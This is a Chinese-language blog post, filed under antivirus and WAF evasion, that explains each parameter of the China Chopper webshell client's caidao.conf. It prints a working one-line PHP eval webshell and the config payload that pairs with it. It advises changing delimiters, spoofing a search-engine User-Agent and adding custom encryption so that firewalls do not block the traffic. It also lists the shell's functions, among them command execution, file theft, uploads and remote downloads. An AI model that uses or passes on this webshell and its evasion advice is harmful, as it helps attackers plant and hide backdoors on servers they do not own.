caidao.conf参数表,菜刀配置详解
- 发表于
- 免杀
新版菜刀更新了后,配置项增加了更多可自定义值,现在它更锋利了,就和以前的鸽子一样,配置文件免杀后,可能你的SHELL就过了!
<FLAG>
返回的内容分隔符,只限三个字符。我们知道原来的分割符是 ->| 与 |<-, 有些 waf 会拦截这个字符,所以,我们可以用生辟点的字符,比如说 ~>$。
<UA>
定制 HTTP 请求中的 User-Agent 部分,我们看到默认的 caidao.conf 中将 UA 改成了百度蜘蛛的 UA, 当然你可以改成 Google 的嘛。有些时候需要改改,大部分情况下这个参数可以不用改。
<K1> 与 <K2>
POST的参数名称,默认情况下, K1 是 z1,K2 是 z2。一般情况下,waf 是不会拦这个,所以可以不用改。
<PHP_BASE>, <ASP_BASE>, <ASPX_BASE>, <PHP_BASE.加密示例>
这4个是 webshell 的基础代码部分,所有的功能代码都会发到这里进行组装,然后发送到服务端去。
如果你服务端的 webshell 做了一层加解密操作,比如服务端代码是这样的
<?php @eval(base64_decode($_POST['caidao']));?>
那么,你就可以在这里修改配置为
<PHP_BASE.加密示例>eval(base64_decode($_POST[id]));&id=%s</PHP_BASE.加密示例>
可以负责任的讲,免杀,过 waf 大部分都是在这里作文章的,后面基本都是一些功能函数,waf 一般是不会杀的,他要是敢杀,就证明他的业务中不需要那类操作。
这里就有意思了,你想,以前的菜刀只有一个 base64_decode 那现在,你就可以随便改了,比如说,你用 hex, 再比如你可以用凯撒密码,又或者是栅栏密码,再过分点,你可以用 AES, DES,最过分的就是自己写一个加密解密的算法。那样 waf 想拦就很尴尬了。(作者说的过 waf 大概就是这层意思吧)
<GETBASEINFO>
获取基础信息的功能代码。比如你添加完 shell, 直接去虚拟终端,一进去就会显示当前路径,当前用户,系统类型什么的这些。
<SHOWFOLDER>
文件目录查看功能代码。这里主要就是用户传进来一个路径,然后把这个路径下的目录,文件全都显示出来,包括一些属性,比如文件时间,权限,类型等。
<SHOWTXTFILE>
查看文件内容,编辑文件也首先调用的就是这里。
<SAVETXTFILE>
保存文件。
<DELETEFILE>
删除文件
<DOWNFILE>
下载服务器文件到本地。
<UPLOADFILE>
上传文件到服务端。
<PASTEFILE>
粘贴文件。
<NEWFOLDER>
新建目录。
<WGET>
从远程下载一个文件到服务器。
<SHELL>
执行系统命令,这里比较尴尬的地方,就是相关函数被干掉的话,基本是没戏。
原文连接
的情况下转载,若非则不得使用我方内容。